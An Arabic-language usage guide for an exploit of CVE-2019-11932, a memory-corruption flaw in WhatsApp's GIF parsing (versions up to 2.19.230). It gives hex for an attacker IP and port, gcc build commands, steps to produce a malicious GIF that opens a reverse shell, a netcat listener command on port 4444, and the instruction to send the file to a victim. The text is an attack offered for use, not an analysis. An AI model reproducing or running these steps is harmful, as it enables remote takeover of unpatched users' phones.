
استغلال ثغرة CVE-2019-11932، وهي تجاوز سعة المخزن المؤقت في تحليل صور GIF في واتساب (الإصدارات ≤2.19.230). يقوم بتجميع صورة GIF ضارة تؤدي إلى تشغيل شل عكسية إلى عنوان IP ومنفذ يحددهما المهاجم.
قم بتعديل عنوان الاستماع (عنوان المهاجم) ومنفذ الاستماع في ملف exploit.c
الكود السداسي التالي:
3139 322e 3136
382e 322e 3732 2034 3434 3420
قم بتجميع الكود:
gcc -o exploit egif_lib.c exploit.c
قم بتشغيل الملف المُجمَّع ./exploit exploit.gif
انسخ/الصق المخرجات في ملف gif
قم بتشغيل مستمع netcat:
nc -lvp 4444
أرسله إلى ضحيتك!
الإصدارات المتأثرة: 2.19.230 وما دون
تم تصحيحه رسميًا في الإصدار 2.19.244
المصدر: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
لينكد إن: https://www.linkedin.com/in/thomas-lounis-749456175/